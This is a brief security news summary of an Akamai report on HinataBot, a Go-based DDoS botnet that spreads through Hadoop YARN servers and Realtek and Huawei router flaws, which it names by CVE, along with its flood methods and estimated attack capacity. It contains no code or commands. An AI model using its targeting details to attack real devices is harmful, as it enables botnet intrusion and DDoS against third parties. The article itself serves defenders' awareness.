GoLang-Based HinataBot Exploiting Router and Server Flaws

A new botnet named HinataBot, which is based on the Golang programming language, has been found exploiting known vulnerabilities to compromise routers and servers for launching distributed denial-of-service (DDoS) attacks. According to a technical report by Akamai, the botnet’s name is inspired by a character from the anime series Naruto, with filenames like “Hinata-<OS>-<Architecture>.” The malware is distributed through the exploitation of exposed Hadoop YARN servers, Realtek SDK devices (CVE-2014-8361), and Huawei HG532 routers (CVE-2017-17215, CVSS score: 8.8).

HinataBot’s threat actors have been active since December 2022, initially using a generic Go-based Mirai variant before developing their custom malware. The malware is still evolving, with newer artifacts found in Akamai’s HTTP and SSH honeypots. HinataBot can contact a command-and-control (C2) server for instructions and initiate attacks on target IP addresses.

The latest version of HinataBot uses HTTP and UDP protocols for DDoS attacks. Tests by Akamai showed that an HTTP flood generated 20,430 HTTP requests, while a UDP flood created 6,733 packets. In a hypothetical real-world attack with 10,000 bots, a UDP flood would peak at over 3.3 terabit per second (Tbps), and an HTTP flood would generate about 27 gigabit per second (Gbps).

The use of Golang in malware, like HinataBot, GoBruteforcer, and KmsdBot, complicates reverse engineering due to its high performance, multi-threading, cross-compilation support, and complexity when compiled. Microsoft’s Azure Network Security Team has highlighted the importance of being proactive and developing a DDoS response strategy as DDoS attacks become more frequent and sophisticated.

Original source: The Hacker News